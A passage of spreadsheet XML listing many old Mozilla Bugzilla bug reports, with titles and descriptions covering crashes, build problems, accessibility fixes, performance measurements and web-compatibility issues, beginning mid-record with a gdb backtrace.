#7  0x00008c91 in Process (cx=0x30bc40 obj=0x2c0000 filename=0x0 forceTTY=0) at ../../shell/js.cpp:436
#8  0x0000a202 in ProcessArgs (cx=0x30bc40 obj=0x2c0000 argv=0xbffff958 argc=0) at ../../shell/js.cpp:806
#9  0x0000b6ac in main (argc=0 argv=0xbffff958 envp=0xbffff95c) at ../../shell/js.cpp:4750
(gdb) frame 0
#0  0x000daab6 in FindPropertyValue (pn=0x0 pnid=0x811b20 data=0xbffff2bc) at ../jsparse.cpp:3560
3560        if (pn-&gt;pn_type != TOK_RC)
(gdb) l
3555                    JS_DHashTableOperate(
3556            return JS_DHASH_ENTRY_IS_BUSY(
3557        }
3558
3559        /* If pn is not an object initialiser node we can't do anything here. */
3560        if (pn-&gt;pn_type != TOK_RC)
3561            return NULL
3562
3563        /*
3564         * We must search all the way through pn's list to handle the case of an
(gdb) p pn
$1 = (JSParseNode *) 0x0
(gdb)</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-422206</t>
  </si>
  <si>
    <t>Setup Windows Mobile trunk tinderbox</t>
  </si>
  <si>
    <t>I will set up temp tinderbox to work out the process.</t>
  </si>
  <si>
    <t>CORE-419626</t>
  </si>
  <si>
    <t>Wrong dom node sometimes used to fire start doc load events</t>
  </si>
  <si>
    <t>Spun off from bug 417249.
Ginn said: in StartLoadCallback we don't have the right domNode.
At that time the domNode we get from domWindow is the document being
destroyed not the document being loaded.
I think it's still a bug somewhere and may cause some problems.
e.g. state-changed:busy is fired for the wrong target on loading start.
I'm not sure if this actually affects any AT usage. AFAICT there is no effect on ATs. If there is a real problem we should raise the priority.</t>
  </si>
  <si>
    <t>CORE-381539</t>
  </si>
  <si>
    <t>remove camino-specific CSS from forms.css</t>
  </si>
  <si>
    <t>Created attachment 265637
fix v1.0
Once the patch on bug 381268 lands we won't need any more Camino-specific CSS in forms.css.</t>
  </si>
  <si>
    <t>CORE-245836</t>
  </si>
  <si>
    <t>nsIContentPolicy should pass the frameelement for loads in frames as aRequestingNode</t>
  </si>
  <si>
    <t>from bug 191839 comment 114 and bug 191839 comment 115
&gt; ... pass the frame element for loads in frames.</t>
  </si>
  <si>
    <t>TOOLKIT-456489</t>
  </si>
  <si>
    <t>WinCE Compiler keyword interface used in mozStorageRow.cpp</t>
  </si>
  <si>
    <t>Created attachment 339887
Change the local variable 'interface' to 'interface_iid'
Need to use a different local variable name than interface - which causes the Microsoft compiler to produce errors.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-472005</t>
  </si>
  <si>
    <t>Bayes trait analysis sees keyword header which biases the evaluation</t>
  </si>
  <si>
    <t>The bayesian filter tokenizer currently sees headers that are set by mailnews itself such as the keywords header. This causes some strange feedback effects particularly in the case of applying soft tags. Since the existance of the keyword itself is obviously a very strong indicator for soft tagging with that header then whether the header is present or not has a strong effect on the calculated trait match percent. This causes after-the-fact trait bayesian percentage calculations to differ dramatically in some cases from the cases where the filter is applied during normal message reciept which is very confusing.
It is actually worse than that. The most common time when you train with a keyword applied is when you are correcting a false positive. In that case the presence of the keyword in the message is an anti-indicator of the need for the keyword. This causes an oscillation in values as the keyword is removed if present or placed if absent on subsequent after-the-fact calculations.
I need to decide whether to hard-wire the tokenizer to ignore headers set by mailnews itself or implement some sort of interface to allow extensions to manipulate the tokenizer.</t>
  </si>
  <si>
    <t>SEAMONKEY-248275</t>
  </si>
  <si>
    <t>In  Warning: function onOk does not always return a value</t>
  </si>
  <si>
    <t>[Mozilla/5.0 (Windows U Win98 en-US rv:1.8a1) Gecko/20040520] (W98SE)
{{
Warning: function onOk does not always return a value
Source File: chrome://messenger/content/am-identity-edit.js
Line: 99
Source Code:
}
}}</t>
  </si>
  <si>
    <t>CORE-128428</t>
  </si>
  <si>
    <t>Implement getComputedStyle for directional list and cursor properties</t>
  </si>
  <si>
    <t>This covers direction unicode-bidi list-style-position
list-style-type and cursor.</t>
  </si>
  <si>
    <t>FIREFOX-465223</t>
  </si>
  <si>
    <t>window values aren't cleared when the window is overwritten</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-387144</t>
  </si>
  <si>
    <t>reinstall bm-rhel01 and bm-winxp01</t>
  </si>
  <si>
    <t>There are two machines in the office - bm-rhel01 and bm-winxp01 - that Alice was using for performance testing but are no longer needed.
Can these be reinstalled with CentOS 5 and Win2k3 for John O'Duinn to use?</t>
  </si>
  <si>
    <t>FIREFOX-214266</t>
  </si>
  <si>
    <t>Find in Page UI</t>
  </si>
  <si>
    <t>Look at adjusting defaults for Find in Page dialog wrt Wrap etc.</t>
  </si>
  <si>
    <t>THUNDERBIRD-432026</t>
  </si>
  <si>
    <t>Various accessibility fixes in mail/base/content XUL files</t>
  </si>
  <si>
    <t>A pass at all XUL files in mail/base/content needing accessibility fixes. This contains:
- Missing label/control associations.
- Addition of aria-labelledby associations where they make sense (e. g. in labels that are made up of several controls).
No l10n changes were necessary for these changes.</t>
  </si>
  <si>
    <t>CORE-237717</t>
  </si>
  <si>
    <t>[FIXr]loading iframe or object with html file inta a positioned div causes extra entries of current document in history</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win95 en-US rv:1.6) Gecko/20040113
Build Identifier: Mozilla/5.0 (Windows U Win95 en-US rv:1.6) Gecko/20040113
If an ifame element which has a text/html file as its src or an object element
which has a type=text/html file as its data is loaded dynamically into a
positioned div (layer) the current document is reiterated inappropriately in
the history.  The consequence is that one must hit the back button multiple
times to actually get back to the previous document.
Reproducible: Always
Steps to Reproduce:
1.use createRange() ... appendChild() to load &lt;iframe src=foo.html
...&gt; or  into a
div with position:absolute.
2.check the history list (down-arrow button beside the back button) and you will
see that every time you do 1. another entry of the current document is added
inappropriately to the list.
3.
Actual Results:  
Because of the inappropriate reiterations of the current document in the
history one must hit the back button multiple times (or jump over those
reiterations in the dropdown with the history list) to actually get back to the
previous document.
Expected Results:  
Neither IE nor Opera have this bug. Their back buttons take you back properly to
the previous document.  So should Mozilla'a.</t>
  </si>
  <si>
    <t>fotemac</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-373630</t>
  </si>
  <si>
    <t>ca / Catalan</t>
  </si>
  <si>
    <t>A few Thunderbird (ca) string corrections</t>
  </si>
  <si>
    <t>Created attachment 258285
(ca) mail corrections
A few corrections. Some accesskeys and typos.</t>
  </si>
  <si>
    <t>TOOLKIT_GRAVEYARD-344236</t>
  </si>
  <si>
    <t>Remove xpinstall-based installer code</t>
  </si>
  <si>
    <t>The xpinstall-based toolkit installer can almost go. The Linux code is currently unused and the Windows code is only used by Thunderbird and (I think?) will be ported to use the NSIS installer soon.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-510309</t>
  </si>
  <si>
    <t>Link XPTs for OS X DMG packages</t>
  </si>
  <si>
    <t>Created attachment 394346
patch
Spun out of bug 463605 comment 8.  This is a quick Ts win for OS X packages.  Instead of blocking on bug 463605 Ted says maybe we can take this patch.
XPT linking is done for all platforms except OS X and from what I understand its purpose is perf.  Some DTracing bears that out.  I wrote a script that captures time spent in I/O syscalls during startup.  With a single linked XPT the time spent during these calls during cold startup drops more than an order of magnitude from nearly 300ms to 10ms.  A caveat is that I did not see a conclusive matching drop in wall clock time and I'm not sure yet why.
Here's some data that shows time spent on each XPT during cold startup and the associated syscalls.  Numbers are durations in ms.  (Hope this isn't too hard to read in bugzilla!)
Without XPT linking:
adw@tinkerbell:~/startup/dtrace$ ./io_syscalls.rb data/08-11/Minefield.app-package-01 -m '\.xpt$'
    0.33 /Users/adw/startup/dist/08-10/Minefield.app/Contents/MacOS/components/xpcom_system.xpt                 close_nocancellstatopen_nocancelread_nocancelstat
    0.33 /Users/adw/startup/dist/08-10/Minefield.app/Contents/MacOS/components/pref.xpt                         close_nocancellstatopen_nocancelread_nocancelstat
    0.35 /Users/adw/startup/dist/08-10/Minefield.app/Contents/MacOS/components/dom_range.xpt                    close_nocancellstatopen_nocancelread_nocancelstat
    0.35 /Users/adw/startup/dist/08-10/Minefield.app/Contents/MacOS/components/xpcom_threads.xpt                close_nocancellstatopen_nocancelread_nocancelstat
    0.35 /Users/adw/startup/dist/08-10/Minefield.app/Contents/MacOS/components/dom_traversal.xpt                close_nocancellstatopen_nocancelread_nocancelstat
--- snip ---
   14.96 /Users/adw/startup/dist/08-10/Minefield.app/Contents/MacOS/components/satchel.xpt                      close_nocancellstatopen_nocancelread_nocancelstat
   15.20 /Users/adw/startup/dist/08-10/Minefield.app/Contents/MacOS/components/fuel.xpt                         close_nocancellstatopen_nocancelread_nocancelstat
   16.11 /Users/adw/startup/dist/08-10/Minefield.app/Contents/MacOS/components/downloads.xpt                    close_nocancellstatopen_nocancelread_nocancelstat
   17.19 /Users/adw/startup/dist/08-10/Minefield.app/Contents/MacOS/components/intl.xpt                         close_nocancellstatopen_nocancelread_nocancelstat
   22.92 /Users/adw/startup/dist/08-10/Minefield.app/Contents/MacOS/components/toolkitsearch.xpt                close_nocancellstatopen_nocancelread_nocancelstat
TOTAL: 295.557289
With XPT linking (durations of each syscall invocation also shown):
adw@tinkerbell:~/startup/dtrace$ ./io_syscalls.rb data/08-11/Minefield_firefox.xpt.app-package-01 -m '\.xpt$' -d '*'
   10.65 /Users/adw/startup/dist/08-11/Minefield_firefox.xpt.app/Contents/MacOS/components/firefox.xpt          close_nocancellstatopen_nocancelread_nocancelstat
         |     0.01 lstat
         |     0.02 close_nocancel
         |     0.03 stat
         |     0.03 open_nocancel
         |    10.56 read_nocancel
TOTAL: 10.648244
This is part of Ts work I'm logging at https://wiki.mozilla.org/Firefox/Projects/Startup_Time_Improvements/adw_notes.</t>
  </si>
  <si>
    <t>CORE-350433</t>
  </si>
  <si>
    <t>Same-origin checks that should fail don't</t>
  </si>
  <si>
    <t>We seem to have some inconsistent security checks.  See details in bug 344890 comment 8.
This bug is _solely_ about this inconsistency.  Please do not admix any of the other discussion from bug 344890 here.
I suspect the problem is that needsSecurityCheck is returning a cached false when it shouldn't (because while the cx is the same the principal on the stack is not).  I haven't had a chance to verify this however.  While this is not going to cause problems for XPConnect stuff for non-XPConnect JS variables on pages this could be bad.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-526329</t>
  </si>
  <si>
    <t>[AMO] ini settings on preview.amo differ from production</t>
  </si>
  <si>
    <t>I was just trying to debug an issue on preview and discovered the upload_max_filesize is 2M on preview and 32M on production.  Please fix this and make sure all other settings are the same.  I thought these were running on the same boxes and all the settings were shared?</t>
  </si>
  <si>
    <t>CORE-139866</t>
  </si>
  <si>
    <t>Cookies not sent for session management</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.0rc1) Gecko/20020417
BuildID:    20020417
The site www.snakenetmetalradio.com uses some sort of sesion management that
relies on cookies. If you're not logged in any attempt to access an internal
page redirects you to the login page. If cookies are enabled one is logged in
automatically. This worked up to Mozilla 0.9.9
Now with release candidate 1 I can go to the login page and get logged in
automatically because of activated cookies. The default page after login is
http://www.snakenetmetalradio.com/heavymetallounge/
But then all links (whether clicked or typed in the URL bar doesn't matter) end
in a redirect to the login page where I'm successfully logged in and end up
redirected at http://www.snakenetmetalradio.com/heavymetallounge/ again.
Reproducible: Always
Steps to Reproduce:
1.Login with user name and password at
http://www.snakenetmetalradio.com/heavymetallounge/login.asp
2.This takes you to http://www.snakenetmetalradio.com/heavymetallounge/default.asp
3.Click on link 'Request Queue'
Actual Results:  I end up at
http://www.snakenetmetalradio.com/heavymetallounge/default.asp again
Expected Results:  One should get to this URL:
http://www.snakenetmetalradio.com/heavymetallounge/requests/requestqueue.asp
With a packet sniffer I found out that in Mozilla 0.9.9 a cookie was sent for
each 'GET' request after successful login while with Release Candidate 1 no
cookie is sent (which then obviously is interpreted as 'not logged in' status).</t>
  </si>
  <si>
    <t>Ingo.Strauch</t>
  </si>
  <si>
    <t>SEAMONKEY-231076</t>
  </si>
  <si>
    <t>Remove nsIPref from bookmarks</t>
  </si>
  <si>
    <t>nsIPref switch to nsIPrefService</t>
  </si>
  <si>
    <t>PENELOPE_GRAVEYARD-368372</t>
  </si>
  <si>
    <t>Importer (Mac Eudora Mail) stops importing when it encounters extended charsets</t>
  </si>
  <si>
    <t>Note sure how to describe this one exactly. I have a mental block when it comes to character sets.
The problem is that Penelope's Mac Eudora mail store importer stops importing a message (does not stop the entire import process just stops importing the current message) when it encounters an extended character. For example when importing a Eudora message that has this html in body (from BLAH BLAH BLAH):
&lt;!--
blockquote dl ul ol li { padding-top: 0  padding-bottom: 0 }
 --&gt;Message with various character sets
(Chinese)
The Chinese written
language employs Chinese characters (&lt;font
color=#000000&gt;Ã¤Ã¸Ã©Ã¶&lt;font
face=Lucida Grande&gt;/?  etc...
the imported message in Penelope looks like:
&lt;!--
blockquote dl ul ol li { padding-top: 0  padding-bottom: 0 }
 --&gt;Message with various character sets
(Chinese)
The Chinese written
language employs Chinese characters (&lt;font
color=#000000&gt;
Note that the Penelope message stops at the Ã¤</t>
  </si>
  <si>
    <t>gwenger</t>
  </si>
  <si>
    <t>MOZILLA.ORG-440848</t>
  </si>
  <si>
    <t>Need to add an SVN repo for fizzypop' project</t>
  </si>
  <si>
    <t>We are starting a new project to create web-based tools for extension and xulapp developers. I need an SVN repo for it.
http://wiki.mozilla.org/FizzyPop
http://starkravingfinkle.org/blog/2008/06/mozilla-platform-wizards-fizzypop/
'projects/fizzypop' is fine by me.
I am mfinkle@mozilla.com in LDAP.</t>
  </si>
  <si>
    <t>FIREFOX_OS_GRAVEYARD-968741</t>
  </si>
  <si>
    <t>Update test_create_new_alarm to wait for the alarm to trigger</t>
  </si>
  <si>
    <t>This may be difficult or not worth it but let's try anyway..
To create parity with the manual smoke tests update test_create_new_alarm.py to wait for the alarm to trigger.
After creating the alarm kill the Clock app and wait for the alarm alert.
Update the test's name to suit.
Be very wary of any race condition between the trigger time of the alarm and the current time passing (which might mean the alarm would not trigger for 23hr 59 minutes). 
If you run into problems that mean the test code is too difficultfragile or causes the test to take too long to run then please push back on this task.
This may be blocked by:
https://bugzilla.mozilla.org/show_bug.cgi?id=946130
Similarly using actions might be slow or unreliable so investigate other ways to set the alarm's time if need be.</t>
  </si>
  <si>
    <t>viorelaioia</t>
  </si>
  <si>
    <t>BUGZILLA-133201</t>
  </si>
  <si>
    <t>syntax error in show_bug.cgi</t>
  </si>
  <si>
    <t>The templatised show_bug.cgi causes a syntax error in IE due to quoting in
template/default/show/show_bug.html.tmpl (line 409)
-             onchange=if ((this.value != [% bug.assigned_to_email %]) &amp;&amp;  
+             onchange=if ((this.value != '[% bug.assigned_to_email %]') &amp;&amp;</t>
  </si>
  <si>
    <t>BUGZILLA-245075</t>
  </si>
  <si>
    <t>Need a command-line script to send unsent bugmail</t>
  </si>
  <si>
    <t>There is a fair bit of evidence that we're still losing bugmail somewhere...
Until those situations are resolved we still need a command line program to
send it that can be run from cron on a regular basis.  We used to do this with
processmail rescanall but processmail went away and that job is now done
from the web with sanitycheck.cgi.
We have a script we've been using for this at bugzilla.mozilla.org.  We need to
make sure it gets included with Bugzilla.</t>
  </si>
  <si>
    <t>FIREFOX-479397</t>
  </si>
  <si>
    <t>this.windowToFocus.content null in nsSessionStore.js</t>
  </si>
  <si>
    <t>Mozilla/5.0 (X11 U Linux i686 en-US rv:1.9.0.8pre) Gecko/2009021904 GranParadiso/3.0.8pre ID:2009021904
When starting FireFox I get the following JavaScript error:
Error: this.windowToFocus.content is null
Source File: ///usr/home/matt/graze/browsers/firefox/components/nsSessionStore.js
Line: 1827
Looking at the source I see this:
    if (this.windowToFocus) {
      this.windowToFocus.content.focus() /* THIS LINE */
    }
Starting in safe-mode makes this go away but starting in normal mode with the SessionManager extension disabled doesn't it make it go away.
As far as I can tell this is having no effect on restoring my sessions when I start FireFox.
List of extensions:
About Menu 1.3.2
AboutPlug 1.4
Autofill Forms 0.9.5.2
ChatZilla 0.9.84
ConsoleÂ² 0.3.9.1
Controle de Scripts 1.0.3
Go Parent Folder 1.6
GoogleEnhancer 1.69
Greasemonkey 0.8.20090123.1
gui:config 0.3.7
JavaScript Debugger 0.9.87.4 [DISABLED]
JSView 2.0.5 [DISABLED]
Nightly Tester Tools 2.0.2
No Squint 1.93.2.1
QuickJava 0.4.2.1
Session Manager 0.6.3.5 [DISABLED]
Show Parent Folder 1.4
Smart Middle Click 0.5.1.2
Unhide Menubar 0.0.14
United States English Dictionary 3.0.3</t>
  </si>
  <si>
    <t>FIREFOX-216683</t>
  </si>
  <si>
    <t>Can't install on WinXP</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1 Q312461 .NET CLR 1.0.3705)
Build Identifier: Firebird 0.6.1
I'm trying to install 0.6.1 for the first time I've got no further than 
well nothing happening at all when I try and run the exe.  I tried playing 
with the favorites folder.  And I ran it with the -p flag.  I have an Opera7 
installation and also tried removing that (which was partly successful.)  
Any ideas?
(PS.  When I unzipped MozillaFirebird-0.6.1-win32.zip I got some file 
overwrites (e.g. .rdf bookmark.html ...).  Which struck me as odd. 
There are 310 items in the new folder.)
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Running WinXP Home Edition with SP1 installed.  IE Ver 6 is installed.</t>
  </si>
  <si>
    <t>mike_bernstein</t>
  </si>
  <si>
    <t>BUGZILLA-77473</t>
  </si>
  <si>
    <t>mysql's encrypt is not DB independent</t>
  </si>
  <si>
    <t>By having the code use the builtin mysql encrypt function one can't port the
code to other DBs (my goal).  This might also help other OS's.  [patch to be
attached]</t>
  </si>
  <si>
    <t>kevin.brannen</t>
  </si>
  <si>
    <t>BUGZILLA-534057</t>
  </si>
  <si>
    <t>Incoming Email</t>
  </si>
  <si>
    <t>Auto-completion no longer works in email_in.pl</t>
  </si>
  <si>
    <t>As said in bug 526158 auto-completion is now broken. We should fix it before 3.6.</t>
  </si>
  <si>
    <t>BUGZILLA-426882</t>
  </si>
  <si>
    <t>Remove Windows 98 Windows NT and Mac System 9.x from Operating System drop-down menu on Enter A Bug page</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.0 en-US rv:1.9b5pre) Gecko/2008032505 Firefox/3.0b5pre
Build Identifier: 
Spinoff from bug 426088.
Windows 98 Windows NT and Mac System 9.x should be removed from the Operating System drop-down menu on the Enter A Bug page because they are no longer commonly used and will not be supported by Firefox 3 or other Gecko 1.9-based apps.
Also as a workaround if a new bug needs to be filed against one of those OSes the OS field can be corrected after the bug has been filed.
Reproducible: Always</t>
  </si>
  <si>
    <t>andrewm715+bugzilla</t>
  </si>
  <si>
    <t>BUGZILLA-106901</t>
  </si>
  <si>
    <t>Templates should be checked for tabs.</t>
  </si>
  <si>
    <t>Templates should be checked for tabs.  Not just Perl.</t>
  </si>
  <si>
    <t>CALENDAR-460252</t>
  </si>
  <si>
    <t>Today Pane Integration in the new Thunderbird tab model (currently not available in mail tab)</t>
  </si>
  <si>
    <t>With moving the calendar mode and task mode content into it's own tab (Bug 402365) the Today Pane is no longer visible in mail mode.
In my opinion it might be better to get rid of the mode dependent Today Pane and its displaying inside the tab. Instead the Today Pane could be part of the main window that can be enabled regardless of what tab is currently opened or displayed.</t>
  </si>
  <si>
    <t>SEAMONKEY-98109</t>
  </si>
  <si>
    <t>[RFE] make type=primary-content dynamically shiftable</t>
  </si>
  <si>
    <t>Hyatt if you can fix this that would be perfect for us.
This is what fabian wrote on one of our bug reports.
I asked hyatt about this on #mozilla. Here's what he said. window._content
returns the window object of the _primary_ . A  is primary if
it has the attribute type=primary-content. Only one  should have that
type at a given time. All other 's should have type=content. The main
problem is that this type attribute is not dynamically shiftable currently
that is the shells aren't live. Hyatt says its easy (for him) to make
type=primary-content shiftable thus updating the shells at the same time.
/Neil</t>
  </si>
  <si>
    <t>neilpryde92651</t>
  </si>
  <si>
    <t>FIREFOX-342906</t>
  </si>
  <si>
    <t>Tab Overflow Scroll:  Clicking and holding the button should scroll continuously</t>
  </si>
  <si>
    <t>On Mac:
- mousing over the arrows that appears auto scrolls way too fast to be able to read what's going by
On Windows:
- mousing over the arrows does nothing clicking scrolls in increments
- holding down the mouse button on the arrow does not continuously scroll
What should happen across platforms:
- Clicking the button once scrolls by a little
- Clicking and holding the button scrolls continuously
- Mousing over does nothing</t>
  </si>
  <si>
    <t>BUGZILLA-301070</t>
  </si>
  <si>
    <t>bugzilla.org should link to this ANSI SQL reference</t>
  </si>
  <si>
    <t>In the URL field is an excellent reference for ANSI SQL where each vaild ANSI
statement is broken down into BNF (which will be familiar to anybody who's used
to reading RFCs).
We should link it from Developer Resources. I also downloaded the .tar.gz of the
site in case it ever goes offline and we could host it at bugzilla.org (or
elsewhere).</t>
  </si>
  <si>
    <t>MOZILLA.ORG-376828</t>
  </si>
  <si>
    <t>MozillaBuild: start-msvc8.bat: if DISPLAY is set msys\bin\rxvt failed to load libX11.dll</t>
  </si>
  <si>
    <t>When DISPLAY is set MinGW rxvt dies with failed to load libX11.dll.  (This is probably a MinGW problem.)  MozillaBuild could work around this by unsetting DISPLAY before trying to start rxvt (falling back to the normal MinGW - I guess it's using Win32 API or something?)
Steps to reproduce:
0) Install MozillaBuild 1.1
1) Set DISPLAY to something (possibly with a real X server somewhere)
2) Launch start-msvc8.bat or any other
Expected results:
Some sort of rxvt
Actual results:
Command prompt window flashes and goes away.
--
I think rxvt is attempting to use the existing X server (I'm using Xming) to display things instead of whatever Win32 thing it uses by default however the libraries needed for that (libX11.dll) isn't part of MozillaBuild.  (It does have a libW11.dll)</t>
  </si>
  <si>
    <t>CORE-510553</t>
  </si>
  <si>
    <t>TM: Windows 'make check' is busted in new trace-test harness</t>
  </si>
  <si>
    <t>This is caused by yucky differences in shell quoting and path separators.</t>
  </si>
  <si>
    <t>CALENDAR-374121</t>
  </si>
  <si>
    <t>Strict warnings in calendarWindow.js calendar-month-view.xml calGoogleCalendar.js calGoogleSession.js</t>
  </si>
  <si>
    <t>Created attachment 258707
rev0 - fix strict warnings
There are some strict warnings in calendarWindow.js calendar-month-view.xml calGoogleCalendar.js and calGoogleSession.js:
Warning: trailing comma is not legal in ECMA-262 object initializers
Source File: chrome://calendar/content/calendarWindow.js
Line: 78 Column: 3
Source Code:
   }
-&gt; Solution: remove trailing comma
Warning: anonymous function does not always return a value
Source File: chrome://calendar/content/calendar-month-view.xml
Line: 127 Column: 12
Source Code:
            }
-&gt; Solution: from looking at the .idl and the Thunderbird implementation there is no need to return anything from getFlavorData() -&gt; remove return
Warning: function cGC_general_response does not always return a value
Source File: file:///C:/[...]/calGoogleCalendar.js
Line: 806 Column: 4
Source Code:
    }
-&gt; Solution: return null in error case
Warning: test for equality (==) mistyped as assignment (=)?
Source File: file:///C:/[...]/calGoogleSession.js
Line: 386 Column: 56
Source Code:
                while (request = this.mItemQueue.shift()) {
-&gt; Solution: add another pair of braces</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID_GRAVEYARD-463745</t>
  </si>
  <si>
    <t>DOMLinkAdded event</t>
  </si>
  <si>
    <t>Created attachment 346996
rework favicon handling.
The time for this is proportional to the number of . Seems that many sites have 7 more of these elements which ends up using about 100ms of cpu time.
Maybe there is a way to do this using xpath so we don't have to do a callback per  element but I don't know anything about that.</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-769243</t>
  </si>
  <si>
    <t>WebOps: Labs</t>
  </si>
  <si>
    <t>Create 5 minute auto-updates from github to source-dev1.vm.labs.scl3.mozilla.com</t>
  </si>
  <si>
    <t>I've managed to set up the dev server for source-dev.mozillalabs.com - thanks very much Gozer for openning up the DNS!
Has now been asked if we can set up an auto update - pulling from https://github.com/mozilla/source (development branch) at 5/10 minute intervals?
From what I can tell the process is similar to a normal playdoh site - we've got nothing weird and custom for this build.
Any problems/questions please let me know
Ross</t>
  </si>
  <si>
    <t>webops-labs</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-218271</t>
  </si>
  <si>
    <t>Enable Camino to set itself to be the default browser</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.5b) Gecko/20030902 Camino/0.7+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.5b) Gecko/20030902 Camino/0.7+
In Panther the user is no longer able to set the default web browser through the
internet system preference pane. We should add this option to Camino itself
before Panther comes out otherwise user are not abe to set Camino as their
default browser.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-462217</t>
  </si>
  <si>
    <t>mobile builds need a clobber</t>
  </si>
  <si>
    <t>Since 21:53:51 yesterday we're getting
eval eval /builds/scratchbox/sbin/chroot-uid /builds/scratchbox/users/cltbld /scratchbox/tools/bin/env - $SBENV /scratchbox/tools/bin/bash -l /scratchbox/tools/bin/exec.sh build/mozilla-central hg pull -u
pulling from http://hg.mozilla.org/mozilla-central
searching for changes
adding changesets
adding manifests
adding file changes
added 12 changesets with 37 changes to 37 files
this update spans a branch affecting the following files:
aborting update spanning branches!
(use 'hg merge' to merge across branches or 'hg update -C' to lose changes)
program finished with exit code 1
The checkin that caused this is 
  http://hg.mozilla.org/mozilla-central/rev/945ee52fc955a030970a1483f9c7cb58dfbde0c7
which looks OK (ie doesn't add a new head). We should just go round the machines an clobber.</t>
  </si>
  <si>
    <t>CORE-231313</t>
  </si>
  <si>
    <t>XUL tabs on Mac OS X render as 10.2-style tabs</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7a) Gecko/20040105 Firebird/0.7+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.7a) Gecko/20040105 Firebird/0.7+
The Page Info window and any other place that uses OS X tabs should use the
new OS X tabs that were introduced in OS X 10.3 (Panther).
Here's a screenshot of a window that uses the correct new tabs:
http://www.diveintoosx.org/images/2003/10/directory_access_main.jpg
This does NOT apply to the tab-browsing tabs - they aren't native and probably
won't be.
Reproducible: Always
Steps to Reproduce:
1. Right click in a page
2. Choose View Page Info
Actual Results:  
See old-style OS X tabs
Expected Results:  
You should see the new style Panther tabs</t>
  </si>
  <si>
    <t>SEAMONKEY-6718</t>
  </si>
  <si>
    <t>Installer INI files should accept Windows line endings</t>
  </si>
  <si>
    <t>With a little luck we should be able to use CCK Wizard running on a windows box
to create an installer that installs onto a Mac.  By starting with the right set
of jars and ensuring that all other files are cross platform this should just
work.
One area where we might be in trouble is the line endings of files.  If the Mac
stub installer chokes on windows line endings then this scheme wouldn't work.
Please make the Mac parser handle windows line endings (especially if it's a
one-liner!)</t>
  </si>
  <si>
    <t>CORE-503710</t>
  </si>
  <si>
    <t>PR_FormatTime / strftime() doesn't work on Windows CE shunt</t>
  </si>
  <si>
    <t>Loading about:cache on my CE device shows a number of entries in the disk cache (and sometimes a few in the memory cache). All of these entries have blank spaces where the last-modified / expires timestamp should be. If I click an entry to view it's response headers I can see that Expires and Last-Modified headers are indeed there...</t>
  </si>
  <si>
    <t>CORE-407401</t>
  </si>
  <si>
    <t>Remove namespaced ARIA support in feed parser</t>
  </si>
  <si>
    <t>ARIA now longer allows namespaced properties.
ARIA looks like this now:
Just remove any namespaces from the attribute names and values.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-361824</t>
  </si>
  <si>
    <t>certificate error (from IE7) when I attempt to get add on from https://addons.update.mozilla.org/</t>
  </si>
  <si>
    <t>certificate error (from IE7) when I attempt to get add on from https://addons.update.mozilla.org/
using IE7 I went to google and attempted to find the sqlite storage inspector.
http://www.google.com/search?hl=en&amp;lr=&amp;rls=com.microsoft%3Aen-
us&amp;q=sqlite+storage+inspector
the url I found on google was for https://addons.update.mozilla.org/ but I don't think that matches our cert which is for *.mozilla.org
(note https://addons.mozilla.org does not give me a certificate error)
here comes some screen shots.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-171594</t>
  </si>
  <si>
    <t>Sourceforge stylesheets served as text/html</t>
  </si>
  <si>
    <t>Warning: The stylesheet http://sourceforge.net/cssdef.php was loaded as CSS even
though its MIME type text/html is not text/css.
I5n\7 i7 p4r7icu14r1y b4d 7h47 g33k 5i735 3nd up 45 3v4ng31i57 vic7im5Â¿</t>
  </si>
  <si>
    <t>nikd</t>
  </si>
  <si>
    <t>CORE-275894</t>
  </si>
  <si>
    <t>[BC] borderWidthfor cell not changed in onload event</t>
  </si>
  <si>
    <t xml:space="preserve">I tried to change borderWidth style property in onload body event. But it didn't
work. The code is executed with no error but the width doesn't change. If I
change the color it's ok. If I change the border width in a cript in the body
it works (and this code is executed before the onload...)
See and try exemple below :
	&lt;body text=#000000 bgcolor=#FFFFFF
onload=document.getElementById('matd1').style.border='1px blue solid'&gt;
			table {border-width:0 border-collapse: collapse border-spacing: 0px 
border-color: #3B574B }
			td {border-style: solid border-spacing: 0px }
					case1
					case2
					case3
			document.getElementById(matd2).style.border=1px red solid
</t>
  </si>
  <si>
    <t>superbolo</t>
  </si>
  <si>
    <t>CORE-469558</t>
  </si>
  <si>
    <t>--enable-system-lcms build option should be removed</t>
  </si>
  <si>
    <t>We can't build with system lcms anymore and we won't be able to any time soon.
filed in response to bug 469556.</t>
  </si>
  <si>
    <t>BUGZILLA-509043</t>
  </si>
  <si>
    <t>Displaying the show_bug template should not require extraneous variables</t>
  </si>
  <si>
    <t>Right now in order to display a bug you have to set bugs use_keywords patchviewerinstalled bugids and bug_list. Ideally you should only have to set bugs. (This particularly would make life a lot easier on extensions when they want to display a bug.)</t>
  </si>
  <si>
    <t>CORE-343599</t>
  </si>
